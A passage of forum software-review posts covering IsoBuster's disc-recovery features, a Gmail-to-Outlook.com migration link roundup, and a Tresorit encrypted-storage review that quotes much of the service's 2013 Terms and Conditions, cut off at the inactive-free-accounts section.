  75.     Extraction of Audio tracks to wave files.
  76.     Support for the Expert Witness compressed Format (EWF).
  77.     Play audio analogue. Instruct the drive to play the audio through the analogue output.
  78.     Ability to pause a number of seconds between retries to allow the drive to "recover" (useful for older drives in combination with marginally readable media).
  79.     Creation of multi-file image files or disc spanning to specified size.
  80.     Support for bootable CDs and DVDs. Support for the El Torito standard. Perfect aid to slipstream Windows installation CDs.
  81.     Add, Edit, Delete files found based on their signatures.
  82.     Show file extents. (Show the different parts of a file, when it is fragmented on disc).
  83.     Ability to add/edit extents on custom created files (e.g. Lost and Found and Customizable file system).
  84.     Ability to add a customizable file system (where you can add, edit files, for engineering purposes).
  85.     Support for command line parameters.
  86.     Comprehensive help file (also available online).
  87.  
  88. On top of this, IsoBuster interprets image files, such as:
  89.     *.DAO (Duplicator)
  90.     *.TAO (Duplicator)
  91.     *.ISO (Nero, BlindRead, Creator)
  92.     *.BIN (CDRWin)
  93.     *.IMG (CloneCD)
  94.     *.CCD (CloneCD)
  95.     *.CIF (Creator)
  96.     *.FCD (Uncompressed)
  97.     *.NRG (Nero)
  98.     *.GCD (Prassi)
  99.     *.P01 (Toast)
  100.     *.C2D (WinOnCD)
  101.     *.CUE (CDRWin)
  102.     *.CDI (DiscJuggler)
  103.     *.CD (CD-i OptImage)
  104.     *.GI (Prassi PrimoDVD)
  105.     *.PXI (PlexTools)
  106.     *.MDS (Alcohol)
  107.     *.MDF (Alcohol)
  108.     *.VC4 (Virtual CD)
  109.     *.000 (Virtual CD)
  110.     *.B5T (BlindWrite)
  111.     *.B5I (BlindWrite)
  112.     *.DMG (Apple Macintosh)
  113.     *.IBP (IsoBuster)
  114.     *.IBQ (IsoBuster)
  115.     *.NCD (NTI)
  116.     *.FLP (Floppy image)
  117.     *.E01
  118.     *.S01
  119.     *.L01 (Expert Witness Format)
  120.     *.RMG (Rimage)
  121.     *.DSK (Generic Disk Image)
  122.     *.VMDK (virtual Machine Disk)
  123.     *.UDF (UDF Image)
  124.     *.DD
  125.     *.XISO
  126.     *.XBX
  127.  
  128. IsoBuster also features Language support for over forty languages.


Needs Improvement:
No notes on this as at this stage (nothing to fault).

Why I think you should use this product:
If you are a PC user who requires a flexible multimedia data recovery/backup tool then this could be the tool for you.
IsoBuster is also very useful for inspecting, analysing, diagnosing problems on and reconstructing various formats of data volumes/disks.

How it compares to similar products:
I have no direct knowledge/experience of similar tools, however http://alternativeto.../software/isobuster/ lists these:
  • PowerISO
  • Stellar Phoenix CD DVD Data Recovery
  • CD Recovery Toolbox
  • Recover Disc 2.0
  • Recovery Toolbox for CD
  • Greenfish DataMiner

Conclusions:
Does what it says on the box, including:
...functionality to clean up MPEG in MPEG based files (for instance *.VOB files). When you extract recovered video from Video DVDs (for instance *.VOB files) you can choose to "Extract but filter only MPEG frames". When you choose this extraction option you will end up with pure mpeg-2 *.MPG files that can be played by all software, including embedded software in TVs etc. No more problems converting VOB files first to play, or to be able to master new DVDs from etc.
(This only works if the .VOB has been decrypted from any region encoding first, using something such as DVD Shrink, for example.)

122
Living Room / Migrating from Google Gmail.com to Microsoft Outlook.com
« on: December 11, 2013, 11:55 PM »
Looks like this is now finally feasible, non-problematic and easy, thanks to a migration tool provided by Microsoft.    :Thmbsup:
The post (link below) from the Microsoft Outlook Blog explains it in detail. The other two posts are relevant for background for those of us who may feel themselves to be reluctant or locked-in captives of Gmail.    >:(
  • Outlook Blog - Outlook.com makes it even easier to switch from Gmail
    by Naoto Sunagawa, December 11 2013
    Today, we are announcing a new service that makes it easier than ever to import your Gmail account to Outlook.com. This will be rolling out to everyone over the coming weeks, so if you don't have access to it yet, check back soon.
    (Read the rest at the link.)
    ___________________

  • The case against Gmail | ZDNet
    By Ed Bott for The Ed Bott Report | October 29, 2013
    Summary: Gmail was a breath of fresh air when it debuted. But this onetime alternative is showing signs that it's past its prime, especially if you want to use the service with a third-party client. That's the way Google wants it, which is why I've given up on Gmail after almost a decade.
    (Read the rest at the link.)
    ___________________
  • How I switched from Gmail to Outlook.com (and how you can too)
    By Ed Bott for The Ed Bott Report | October 31, 2013
    Summary: So long, Gmail, it was nice knowing you. After nearly a decade, I've finally moved my personal email away from Google's service. If you're considering doing the same, here's a step-by-step guide to help you set things up the right way.
    (Read the rest at the link.)
    ___________________



123
Originally posted:2013-12-07
Last updated2015-06-04

Basic Info
App/Service NameTresorit 04-logo.jpg   "Secure" (caveat), end-to-end encrypted Cloud storage service (FREE)
(From the German noun "tresor" - a lockable, armoured cabinet.)
Thumbs-Up RatingWARNING! was previously 5 x :Thmbsup:, but currently  :down: :down: :down: :down: :down:
A "secure" (but may not meet your definition of such) encrypted Cloud storage service that meets 2 essential security criteria:
  • (a) not US-based and not subject to US laws, and
  • (b) is encrypted (post-SnowdenGate) and successfully protects against US NSA legal/illegal surveillance, with the encryption keys being unknown to the Cloud service provider.
    Note: If you just want this on its own, refer: Pre-encryption makes cloud-based storage safer
App URLhttp://tresorit.com/
App Version ReviewedCurrent version: v2.0.452.324
Test System SpecsMS Win7-64 HP, Win8-64, Win8.1-64 PRO
Supported OSesPC Windows (various)
Support MethodsSupport website: https://support.tresorit.com/home
Descriptive white paper: http://tresorit.com/...esoritwhitepaper.pdf
Upgrade PolicyFree upgrades.
Trial Version Available?Not applicable - this is FREEware.
Pricing SchemeFREEware. There are PAID schemes for extra storage.

Definition of Secure: - Concise Oxford Dictionary (10th Ed.)
secure
· adj.
  • 1 fixed or fastened so as not to give way, become loose, or be lost.
  • 2 certain to remain safe and unthreatened. Ø protected against attack or other criminal activity.
  • 3 feeling free from fear or anxiety. Ø (secure of) dated feeling no doubts about attaining.
  • 4 (of a place of detention) having provisions against the escape of inmates.
· v.
  • 1 make secure; fix or fasten securely.
  • 2 protect against threats.
  • 3 succeed in obtaining. Ø seek to guarantee repayment of (a loan) by having a right to take possession of an asset in the event of non-payment.
  • 4 Surgery compress (a blood vessel) to prevent bleeding.
– PHRASES secure arms Military hold a rifle with the muzzle downward and the lock in the armpit to guard it from rain.
– DERIVATIVES securable adj. securely adv. securement n. secureness n.
– ORIGIN C16 (earlier (ME) as security): from L. securus, from se- ‘without’ + cura ‘care’.
_______________________________


WARNING!:
EDIT 2015-06-04:
This is to let other users who started using Tresorit on my recommendation know that my original review contained a grievous error/omission of fact, or at least overlooked it.
APOLOGY: I sincerely apologise to anyone who might have been discombobulated by this news. I most assuredly would never have recommended Tresorit had I known, or at least not without some major caveats.

I had not known/realised that the FREE Tresorit storage service reviewed here may not necessarily meet your definition/requirements for "secure" storage, insofar as the FREE account and storage can - and apparently will - be unilaterally deleted after 15-days notice, by Tresorit, if the account has not been accessed for at least 120 days previously. This is as per the Terms and Conditions of Use as at 2013-11-11 section XIV Inactive Free Accounts, and which is not mentioned in section [/b][/i]XIX Termination by Tresorit.
The Terms and Conditions of Use as at 2013-11-11 were/are copied into the spoiler button, below.


Intro and Overview:
From the white paper above:
TRESORIT: COMPLETELY SECURE CLOUD COLLABORATION
Tresorit provides a novel approach to secure cloud storage. The software allows you to share
files and collaborate with your friends and colleagues with guaranteed cryptographic end-to-
end security, without sacrificing the ease of use and performance of unsecure cloud storage
services. With Tresorit, you encrypt files on your computer and the only people able to see the
content are the ones you expressly give permission to. Contrary to other solutions, no storage
provider or network administrator, no unauthorized hacker, not even Tresorit can read your files.
_______________________
The usual storage allocation for a new Tresoit seems to be 5 or 6GB, but could be more if there is a special offer.
I originally got a 50GB account as part of the their special offer on product launch:
Could be a great offer via Lifehacker Dealhacker: (I'm signed up anyway.)
Get 50GB of Free, Encrypted Online Storage from Tresorit
Melanie Pinola   

Windows (Mac, Android, iOS coming soon): There are a ton of online syncing and storage services, but not all of them locally encrypt your data for higher security. Just out of limited beta, Tresorit is a new Dropbox alternative with client-side encryption. The company offers 5GB of free space, but for a limited time Lifehacker readers can grab 50GB free for life.

Tresorit's biggest selling point is the strong security. Your files and folders are encrypted before they're uploaded to the cloud. To get technical about it:

Files are encrypted with AES-256 before being uploaded to the cloud. Additional security is provided before upload by HMAC message authentication codes applied on SHA-512 hashes. Encrypted files are uploaded to the cloud using TLS-protected channels.

The company is also putting its money where its mouth is: On April 15, Tresorit is inviting the world's hackers to try to break its encryption and win $10,000. So Tresorit is pretty confident in its security claims.

The Windows software (Mac, Android, and iOS versions coming before June) is also really easy to use. You can select any folder to be synced (as a "Tresor"), share folders with other users, and also adjust permissions of shared folders by user.

On the downside, there's no web-based access for your files, people you share folders with will also need the software installed, and it takes a few seconds longer for your synced files to appear on another computer (probably because of the encryption that has to happen first). Other Dropbox alternatives with client-side encryption, SpiderOak and Wuala, have more features, but Tresorit's interface is a lot more user-friendly. And it's hard to beat 50GB of free encrypted space.

If you want to try it out, you'll need to register via the link below to get the 50 gigs free. This offer is good until May 20.

Update: Some people are reporting only getting 5GB. Tresorit has fixed the glitch, so it should work fine now, but if you were one of these people, email [email protected] and they'll set you up with the 50GB. Also, you can follow @tresorit on Facebook or Twitter to be notified when Mac and mobile apps are available.

Tresorit

EDIT: It seems to work OK:
 
Tresorit 01 - 50Gb available.jpg
Who this software is designed for:
Any PC user who wants a secure encrypted Cloud storage service that meets 2 essential security criteria:
  • (a) not US-based and not subject to US laws, and
  • (b) is encrypted (post-SnowdenGate) and successfully protects against US NSA legal/illegal surveillance, with the encryption keys being unknown to the Cloud service provider.

Per the website, the features are:
  • Your safe space in the cloud:
    • Store your digital valuables, access them anywhere, and share safely.
    • Highest grade encryption protects every aspect of your content management in the cloud.

  • Turn any folder into a secure tresor:
    • Any folder can be turned into a secure tresor. There’s no need to reorganize your data. You can stick to your own workflow!
    • To drag and drop a folder, or simply right clicking and ‘tresoring it!’ takes only a few seconds.

  • Access anywhere:
    • Access encrypted content anywhere - Tresorit merges privacy and mobility.
    • Store content on your Windows PC or Mac, then take it with you on Android and iOS.

The Good:
When I first started up with the Tresorit account, I adopted a wait-and-see attitude in the light of the SnowdenGate revelations about US NSA legal and illegal surveillance.
However, in a pop-up screen when Tresorit started up on my laptop on 2013-12-07, I was obliged to agree to the changed Terms and Conditions as from 2013-11-11, if I wished to continue using the Tresorit service: (this is a good move on Tresorit's part.)

Tresorit 03-Notice of new policy and Ts&Cs from 2013-11-11.jpg

These are the Terms and Conditions as from 2013-11-11:
Spoiler
Terms and Conditions of Use
11/11/2013
Thank you for using Tresorit! These terms and conditions of use ("Terms") apply to the use of the Tresorit cloud service ("Service") and any other related content and software ("Software") by you and any third party or entity you are using/purchasing the Service on behalf of (together referred to as "You" or "Your"), so please carefully read them before using the Service or the Software. The Terms and the Service chosen by You are the basis of the agreement between You and Tresorit ("Agreement"). The Service is provided by Tresorit AG, Switzerland. By using the Service or by downloading, installing, registering, copying or otherwise using the Software, You are consenting to be bound by these Terms.
If You do not agree to all of these Terms, any use of the Service is unauthorized and You may not download, install, register, copy or otherwise use the Software, or if You have previously downloaded the Software, You must stop accessing the Service and You must uninstall, remove or destroy the Software and any copies immediately.
If You complete the electronic registration process, by clicking the "Register", or "Sign up" buttons, by using the Service or otherwise indicating acceptance of these Terms, You represent that:
- You have full legal capacity to contractually obligate yourself to these Terms and You are not barred under any applicable laws from to do so.
- You understand English and have read, understood and accepted these Terms stated herein.
- You may only use the Service in compliance with these Terms.

I Access to the Service
1. In order to use our Service, You may need to complete a registration process. When You register to the Service, You must:
1.1. Provide information ("Registration Data") which is true, current, complete and accurate.
1.2. Maintain and promptly update Registration Data to keep it true, current, complete and accurate.
2. Your registration application is evaluated by Tresorit, and if we discover that Your Registration Data is not true, not current, incomplete or inaccurate, Tresorit, at its sole discretion and without prior notice, is entitled to immediately terminate Your rights to continue to use the Service and to terminate the license to use the related Software.
3. In relation to the scope, use, protection, sharing, handling, management and procession of any data that You give to Tresorit, including the Registration Data, or Tresorit obtains from Your use of the Service, the Privacy Policy of Tresorit https://tresorit.com/privacy-policy shall form an integral part of these Terms.
4. The Service is not intended for use by You if You are under 18 years of age. By agreeing to these Terms, You are representing to us that You are over 18.

II Ownership and security of Your Content
5. You retain full ownership to Your files, folders, directories, including their metadata (file name, , thumbnails, etc.) and any information You submit to Tresorit (together "Your Content"). We don’t claim any ownership to any of Your Content. These Terms do not grant us any rights to Your Content or intellectual property except for the following limited rights that are needed to run the Service: we may redundantly store or backup Your respective data as set forth below, and we might use trusted third parties, like Microsoft, to provide the Service. You give us the permission for all and any actions that we need to undertake to provide the Service. In particular, but not limited to, You agree that Tresorit may transfer Your data between its servers, to Your devices or to other people’s devices with whom You share content.
6. Tresorit states that Your Content, encryption key and password (together "Your Encrypted Content") uploaded by You or otherwise submitted to the Service, are stored in an encrypted or non-invertible form. Your Encrypted Content cannot be decrypted or inverted by Tresorit or any third party. Your Encrypted Content can only be decrypted or inverted by You and persons You explicitly share Your Encrypted Content with. However, You agree that Tresorit may collect and store some limited information which is needed to run the Service, like Your contact and billing information, Your email address, messages sent to our support team, etc. in a non-encrypted form. You also agree that some third party provided parts of the Service might need different passwords then Your Tresorit account password, which may not be stored in a less secure form (referred together as "Non-Encrypted Content"). Tresorit transmits Non-Encrypted Content by using encrypted channels with reasonable care and skills. We need to have access to Non-Encrypted Content to provide and administer the Service, for example we need Your email address in a non-encrypted form to send You notifications.
7. You agree that Tresorit may transmit any data to trusted third parties only on a need-to-know basis (e.g. Your email address to the e-mail service provider) to provide the Service. Tresorit transmits Your Encrypted Content only in encrypted form. You agree that Tresorit may also transmit any data stored by You to a third party if Tresorit has a reason to believe that it is required:
7.1. To comply with any law or order issued by any legal authority.
7.2. To avoid infringement of the rights of a third party.
7.3. Protect the property of Tresorit or the personal safety of our users and the public.

III Security and Your responsibility
8. You understand that we use strong cryptography algorithms to protect Your data, and we do not have access to Your Encrypted Content. Due to encryption, Your responsibility might be higher than with regard to other similar services. You expressly take the responsibility, stated in these Terms.
9. Tresorit has no access to Your password and there is no way for Tresorit to recover Your password. You hereby take note and accept that if Your password is lost, Your Encrypted Content is irrevocably lost. Tresorit cannot be held liable if Your password is lost and Your Encrypted Content cannot be decrypted. WE STRONGLY RECOMMEND THAT YOU KEEP BACKUPS OF ANY CONTENT ON YOUR OWN SEPARATED SYSTEMS.
10. By using our Service, Your Encrypted Content will be encrypted using an encryption key which is unknown by Tresorit. You can read Your Encrypted Content only with Your password only known to You. Your Encrypted Content can only be read by other persons if You explicitly share Your Encrypted Content with other persons selected by yourself ("Shared User").
11. You are solely responsible and liable for any content You upload, download, share or copy by using our Service or our Software. You hereby agree and undertake:
11.1. To respect data or content of third parties protected by copyright, patent, trademark, trade secret or other intellectual property ("Protected Content").
11.2. Not to upload, download, share, or copy Protected Content or to use the Service otherwise with any Protected Content.
11.3. Not to upload a virus, trojan or any malicious code or software.
11.4. Not to use the Service to transmit any unlawful, harassing, libelous, defamatory, racist, indecent, abusive, violent, threatening, intimidating, harmful, vulgar, offensive or otherwise objectionable content or material of any kind or nature.
11.5. To comply with all applicable laws, rules and regulations.
11.6. Not to use the Service for any illegal purposes.
12. You agree that You are fully responsible and liable for all actions related to the Service of Your employees, consultants and auxiliaries.
13. You acknowledge that You are responsible and liable if You use the share functions of the Service and share files and any other content with Shared Users. We warn You and You confirm that You know and accept, that the shared content can be decrypted by Shared Users. So always consider what You share and with whom You share before You share confidential information with other persons. Do carefully check the email address of the person You like to share Your content. If You type not the right email address, an unknown and undesired user might get access to Your data.
14. Do not accept share requests, files or any other content from users You do not know or You do not trust. Tresorit has no responsibility for actions of persons You share data with. In particular, but not limited to, Tresorit is not liable for malware You receive from users You chose to share with.
15. Tresorit has no control with regard to the content stored and shared by its users using the Service. We are not responsible for the accuracy, completeness, appropriateness, or legality of files, user posts, or any other information You may be able to access using the Service.
16. You must keep Your password confidential, and must not authorize any third party to use the Service on Your behalf. You are responsible for all activities in relation to Your account. Tresorit is not liable for any loss or damage arising from any unauthorized use of Your account. In the event we have a reason to believe that an unauthorized person uses Your account or any other unauthorized use, Tresorit has the right, at its sole discretion and without prior notice, to suspend or disable Your account, or take any action to avoid any unauthorized use .
17. Tresorit NEVER sends emails asking for Your password.
18. You must contact us right away if You suspect misuse of Your account or any security breach in the Service.
19. Tresorit tries, with reasonable care and skill, to protect Your Content stored and synchronized on Your computer by using our Service. You accept that You are solely responsible to maintain, protect, update, secure and backup Your computer and Your locally stored and synchronized content.
20. Parts of encryption keys may be stored on Your computer (memory or persistent storage). You are responsible for Your computer. Tresorit cannot be held liable if You computer is stolen or hacked and an unauthorized hacker gets access to Your Encrypted Data by accessing locally stored copy, or by un-protected passwords or encryption keys on Your computer.

IV Payments and pricing
21. Tresorit offers You upgrades. In order to upgrade, Your account must be bound with one or multiple plan(s) ("User Plan(s)").
21.1. You can create User Plan(s) by creating subscription(s), and adding User Plans to it.
21.2. The subscription is the billing unit ("Subscription(s)"), which means if You have multiple Subscriptions, You will receive multiple invoices. Each Subscription has its own billing period, and can be monthly or yearly paid.
21.3. A Subscription is Your order, and can contain multiple User Plans in one Subscription. You can bind a User Plan to yourself, or to another user, for example to Your colleague, but only to one user. If You bind a User Plan to someone else, You are responsible for the usage of this User Plan by this person. If You accept a User Plan as beneficiary from another user, take note and accept that you are dependent from this person and take the risk that Tresorit may suspend the Service for reasons caused by this person.
21.4. Each User Plan has characteristics ("Feature Quota(s)") included in the User Plan. A Feature Quota can be for example the storage quota, the maximum network bandwidth speed You can use our Service, etc.
21.5. If You are bound to multiple User Plans, we aggregate each User Plan if possible the following way ("Aggregated Feature Quota"): the storage quota included in each User Plan are summed up, and we provide You the Feature Quota, which we think, in our sole discretion, is the most beneficiary for You among the Feature Quotas included in any User Plan bound to You.
22. After You have successfully created a Subscription, and You have bound yourself or another user to User Plan(s), we use reasonable commercial efforts to credit Your new Feature Quota as soon as possible, but in six hours after Your purchase. You agree that Your displayed available storage or other quota may not be current or accurate at any time, but Tresorit uses reasonable efforts to improve the accuracy and actuality.
23. Tresorit may provide You the Service for free of charge, providing a basic Feature Quota. You may also gain additional free service through Tresorit’s referral program or other promotion, as described in the promotions. We reserve the right to, in our sole discretion, discontinue or modify any promotions, credits or other free offers anytime.
24. Payment of the Subscription fee will be by preauthorized credit card charge, and we will automatically charge Your credit card or other agreed payment options monthly or yearly, for each month, partial month or year, depending upon which billing period You have selected for the Subscription. You agree that Your Subscription is automatically renewed for the same period at the end of the billing period ("Renewal date") unless You state otherwise one (1) day before the Renewal date.
25. We will automatically bill Your credit card or other agreed payment options each month or each year on the calendar day when You created Your Subscription. If Your Subscription has started on a calendar day not contained in a given month or year, Tresorit will bill Your credit card on the last day of such month or year.
26. If any fee of a Subscription is not paid in a timely manner, or Tresorit was not able to charge Your credit card with the payable fees, Tresorit has the right to suspend Your entire Subscription and revoke each Feature Quota included any User Plan from You or any user You have bound to. This means, we will decrease Your Aggregated Feature Quota to the aggregation of Your remaining User Plans.
27. You agree and authorize Tresorit to periodically authorize Your credit card in anticipation of account or related charges.
28. You must be authorized to use the credit card of which number You have entered.
29. You agree that if You do not provide Tresorit with a current valid credit card number with sufficient credit upon request during the effective period of this Agreement, You will be in violation of these Terms.
30. Your Subscription may include a time commitment (Committed Period; e.g. one year commitment with monthly payment). If you cancel, terminate or rescind a Subscription or terminate the Agreement during the Committed Period, we are entitled to charge you for the remaining Committed Period according to Your Subscription.
31. All payments by You to Tresorit are final, nonrefundable and there are no refunds or credits for partially used billing periods or partially used Committed Periods, except as stated herein (paragraph 46,73 and 74).
32. Unless specifically provided otherwise herein, payment of all fees are due and payable to Tresorit without demand, invoicing or notice before the commencement of the period to which those fees apply.
33. You agree to be responsible for and to pay any applicable sales, personal property, use, VAT, excise, withholding, or any other taxes that may be imposed, based on this license, use or possession of the Service, or any other product or service provided under these Terms, excluding taxes based on net income payable by Tresorit. If You are exempt from paying any sales, use or other taxes, You must provide Tresorit with appropriate evidence of tax exemption for all relevant jurisdictions.

V Proprietary Rights
34. All contents of the site (www.tresorit.com and any subdomains of tresorit.com), Software and Service and the associated computer programs including but not limited to design, logo, trademarks, domain names, text, software, technical drawings, configurations, graphics, patents, other files, and their selection and arrangement, any other intellectual and industrial property or proprietary rights ("Service Content") are protected by copyright and other intellectual property laws, and owned by Tresorit and/or its suppliers, affiliates, or licensors.
35. Unless we have specifically permitted herein, no portion of the Service Content may be reproduced, modified, distributed, published in any form, or by any means, without prior written permission from Tresorit, and You are not permitted to create any derivative works of Service Content. Tresorit does not give You any license to our intellectual property. Any rights not expressly granted herein are reserved, and no title to or ownership of any proprietary rights related to the Service is transferred to You pursuant to these Terms.
36. We may use any feedback, ideas, comments, enhancement requests, recommendations or suggestions ("Suggestions") You send us or post in our forums without any obligation to You, and You hereby grant to Tresorit a world-wide, royalty free, irrevocable, perpetual license to use and otherwise incorporate any Suggestions.

VI Software and user license
37. Tresorit grants You a non-exclusive, royalty-free, revocable and, except as expressly provided for in these Terms, non-transferable right and license to use the Software related to the Service ("Licensed Software"), solely in accordance with these Terms. Licensed Software is licensed, not sold.
38. On the basis of these Terms, You may download, install, and benefit from using the functionality of the Licensed Software solely in accordance with these Terms and the technical documentation (Documentation).
39. Your license to use the Licensed Software is automatically revoked if You violate these Terms in a manner that implicates our Service Content.
40. The Licensed Software requires You to register prior to its first use. Following the registration, the Licensed Software may be used by You with Your own Registration Data given at the registration on five computer systems it is installed upon, including desktop and mobile systems.
41. You may not:
41.1. Modify or create derivative works based on the Licensed Software or on the Service.
41.2. Remove or modify any Service Content, disclaimer or warning notice included or embedded in any part of the Service or in any part of the Licensed Software or any copy thereof.
41.3. Analyze, decompile, disassemble, reverse engineer, or otherwise attempt to derive all or any part, particularly the source code of the Licensed Software, except for the scope in which such limitation is explicitly prohibited by law. For any release from these limitations the prior written express consent of Tresorit is required.
41.4. Distribute, rent, lease, sell, sublicense or otherwise transfer all or part of the Licensed Software or the Service to any person.
41.5. Permit the Licensed Software to be accessed through "shareware" distribution process.
42. On the basis of these Terms, the You may allow, permanently or temporarily, another person to use the installed Licensed Software downloaded on and installed to any of Your computer systems ("Third Party User"), on condition that:
42.1. The use of the Service by the Third Party User may not violate any provision of these Terms, and that You remain responsible for the use of the Service by the Third Party User in accordance with these Terms.
42.2. The Third Party User agreed to these Terms, in particular, registered and uses the Service with his/her own Registration Data.
42.3. That You shall not be entitled to charge the Third Party User money or fees for the use of the Service or Licensed Software on whatsoever legal title.
42.4. The use of the Service by the Third Party User will not entitle You to any compensation from Tresorit.
43. The Licensed Software may contain third party, open-source, well-analyzed software components ("Third Party Component"), and each of them are chosen with reasonable care. Tresorit acknowledges the efforts of the open-source developers, and what they have done for the community so far. You find the list of their names and their copyright notice here: https://tresorit.com/third-party-code. Note that those copyright notices do NOT endanger Your ownership or the security of Your data.
44. You can uninstall the Licensed Software any time, using Your mobile or desktop operating system’s standard uninstall method. If You need further assistance for uninstalling the Licensed Software, please visit our support site at https://support.tresorit.com, or write us at [email protected].

VII Updates and changes to the Service
45. As part of the development of the Service, Tresorit has the right, in its sole discretion, anytime (i) to add new features, (ii) add new third party software components or (iii) to modify or discontinue features without prior notice to You.
46. If You have paid to use the Service and we materially downgrade its functionality, we will provide You with an adequate and proportional refund of any pre-payment, as we determine appropriate.
47. You are responsible to keep the Licensed Software up to date. You expressly agree that some parts of or the whole Licensed Software might be updated automatically, with or without prior notice to You. In other cases, You may need to download and install the latest version of the Licensed Software. You agree that if You do not keep the Licensed Software up to date, the Service or certain features may cease to be available or may not properly perform. Any updates provided by Tresorit to You shall be deemed to be subject to these Terms unless Tresorit indicates otherwise.

VIII Compliance with Laws
48. The transactions contemplated hereby may be subject to the customs and export/import control laws and regulations of Your country of residence and the countries where our data storage and recovery facilities are located. You agree to comply with all customs and export laws and all other applicable laws, statues, ordinances and regulations relating to use of the Service. You acknowledge that violations of these Terms could subject You to criminal or civil penalties.
49. There may be restrictions and limitations on the import, possession, use, transfer, export and/or re-export to another country of encryption software under the laws of the country in which You intend to use the Service. It is Your sole obligation and responsibility to check such limitations before using the Service and to comply with such restrictions and limitations.
50. Tresorit respects anyone’s privacy, but we also respect embargo legislations. You cannot download and use the Licensed Software if:
50.1. You are located in, national or resident of Cuba, Iran, North Korea, Sudan, Syria or any other country to which Switzerland, the European Union or the United States has embargoed goods.
50.2. You are a person or entity which is prohibited from receiving export from Switzerland, the European Union or the United States.
51. By subscribing to the Service or using any of the Licensed Software, You represent and warrant that You are not - and are not controlled by - any such person or entity and are not controlled by a national or resident of any such country.

IX Disclaimer
9.1 Provided as-is
52. If You are paying for the Service, we promise that we will try to operate the Service with reasonable care and skill and will use reasonable commercial efforts to promptly remedy any faults of which we are aware. However, we provide the Service "as is" and "as available", , without express or implied warranty or condition of any kind and You shall use it at Your own risk. To the maximum extent permitted by applicable law, we also disclaim any warranties of merchantability, fitness for a particular purpose or non-infringement or any warranty that the Service are of any particular quality or purpose and correspondence to the Documentation.
9.2 Disclaimer of liability
53. Tresorit’s liability for simple negligence and for auxiliary persons is excluded. To the maximum extent permitted by the applicable law, Tresorit shall in no event be liable for any lost profits, revenues, or business opportunities, loss of use, loss of data, loss of confidential or other information, business interruption and any other direct, indirect, special, incidental, criminal, subsequent or consequential damages whatsoever, whether based on contract, tort, negligence, product liability or otherwise, arising out of or in any way related to the use of or inability to use the Service or the support and maintenance services (if any) by You, regardless whether Tresorit has been advised or should have had knowledge of the possibility of such damages.
9.3 Force major
54. Tresorit will not be liable to You or to any other person for failure to perform or any delay in the performance of the Service due to fire, flood, war, riot, strike, explosion, lock out, injunction, natural disaster, interruption of transportation, acts of war, terrorism, labor disputes, acts of civil or military authority, power blackouts, computer viruses, or any other event beyond Tresorit’s reasonable control.
9.4 Remedy
55. You agree that the sole and exclusive remedy for unsatisfactory Service shall be termination of the Service and a refund of any amount actually paid by You for the current Service term. Aggregate liability, including any negligence on Your part, for all claims relating to the Service is limited to the amounts paid by You to Tresorit for the past six months of the Service in question.
9.5 High Risk Activities
56. The Service is not intended for use in hazardous environment requiring fail-safe performance, such as in the operation of nuclear facilities, aircraft navigation, air traffic control or aircraft communication systems, direct life support machines or weapon systems in which the failure of the Service could lead directly to death, personal injury or severe physical or environmental damage ("High Risk Activities"). Accordingly, Tresorit and its suppliers specifically disclaim any express or implied warranty of fitness for High Risk Activities.

X Indemnification
57. You shall indemnify, defend, and hold harmless Tresorit and its employees, affiliates, contractors, and agents from and against any and all claims, damages, losses, liabilities, suits, actions, demands, proceedings (whether legal or administrative), and expenses (including, without limitation, reasonable attorneys’ fees) arising from or related to:
57.1. Any breach of these Terms by You.
57.2. Any infringement of the Protected Content by You.
57.3. Any fraud or manipulation by You.
57.4. Any claims for infringement of any third party rights arising from or related to Your data.
57.5. Any claims of credit card fraud based on any information released by You.
Tresorit will reasonably notify You of any such claim or demand that it is subject to Your indemnification obligation.

XI Infringement of Protected Content
58. Tresorit respects the intellectual property rights of third parties, and Tresorit does not tolerate any infringement of such rights by its users. We will respond to notices of alleged copyright infringement if they comply with the applicable law and are properly provided to us. We will take whatever action we deem to be appropriate, in our sole discretion, such as deleting or disabling content alleged to be infringing and to suspend or terminate Services and accounts.
Notices should be sent to:
Copyright Infringement Agent
Tresorit AG, Büelstrasse 7, CH-9052 Niederteufen, Switzerland
[email protected]
59. All infringement notifications must be submitted in writing to the Tresorit Copyright Infringement Agent, and the following information must be included:
59.1. Identification of the Protected Content claimed to be infringed.
59.2. Identification of the material or link allegedly hosting the infringing content, including the URL and the client side decryption key for that.
59.3. The copyright owner’s contact information (including mailing address, telephone number, and email address).
59.4. A statement declaring that
59.4.1. "I hereby state that I have a good faith belief that the use of the Protected Content is not authorized by the copyright owner, its agent, or the law,"
59.4.2. "I hereby state that the information in this notice is accurate"
59.4.3. "I hereby state, that I am the owner or am authorized to act on behalf of the owner of the copyright that is allegedly infringed;"
59.5. The full name and electronic or physical signature of the copyright owner or the copyright owner’s agent.

XII Acceptable use
60. You agree not to misuse the Service. You promise that You will not, will not attempt to or will not encourage or assist any third party to or attempt to:
60.1. Access or use the Service in a way intended to improperly avoid incurring fees or exceeding any Feature Quotas. You are not eligible to use or create multiple user accounts for the purpose of gaining additional cloud storage.
60.2. Use the Service to access, change, damage, delete or edit data without authorization.
60.3. Use any unauthorized means to modify, reroute, or gain access to the Service.
60.4. Misrepresent Your identity, including without limitation by representing that You are a Tresorit employee or representative or another user of the Service.
60.5. Try to access the Service with unauthorized software.
60.6. Damage, disable, overburden or impair the Service or any network connected to the Service.
60.7. Use the Service, directly or indirectly, to offer any service that competes with the Service.
60.8. Participate in any group that encourages violation of these Terms.
60.9. Probe, scan, or test the vulnerability of any system or network. Tresorit may, in its sole discretion, make exceptions to this duty and allow hacking activities against and limited to its non-production infrastructure ("Hacker Arena").
60.10. Participate in any activity which interferes or may interfere with the efficiency of the Service.
60.11. Use the Service in a way that infringes Protected Content.
60.12. Use the Service to facilitate any mass mails, spam, chain letters, snowball systems, or similar communications, regardless of whether they are commercial in nature.
60.13. Use the Service to collect, store or transmit personal data of any person without such person’s consent.
60.14. Store or transmit any software or data containing any virus, malware, trojan, spyware or other software or program code that is malicious in nature.
60.15. Send us untruthful abuse reports.
60.16. Abuse Tresorit referrals to get more credit for referrals than deserved.
60.17. Violate the law in any way, or to violate the privacy of others, or to defame others.

XIII Overuse
61. If Your usage is above what is enabled by Your current Aggregated Feature Quota, Tresorit will notify You about Your overuse. If, in 15 days upon the delivery of such notice, You do not upgrade and increase Your Feature Quota to fit in with Your actual usage, or if You do not decrease Your usage, for example, by deleting files, Tresorit may, at its sole discretion and without further notice, block Your access to the Service, curtail and restrict our Service (e.g. restrict the maximum number of tresors or the maximum number of member per tresor) terminate Your account, or delete some or all of Your files, account information, settings or any other data from its systems, so as to reduce Your storage space available according to Your current Aggregated Feature Quota.

XIV Inactive Free Accounts - NB: this could adversely affect users of FREE Tresorits.
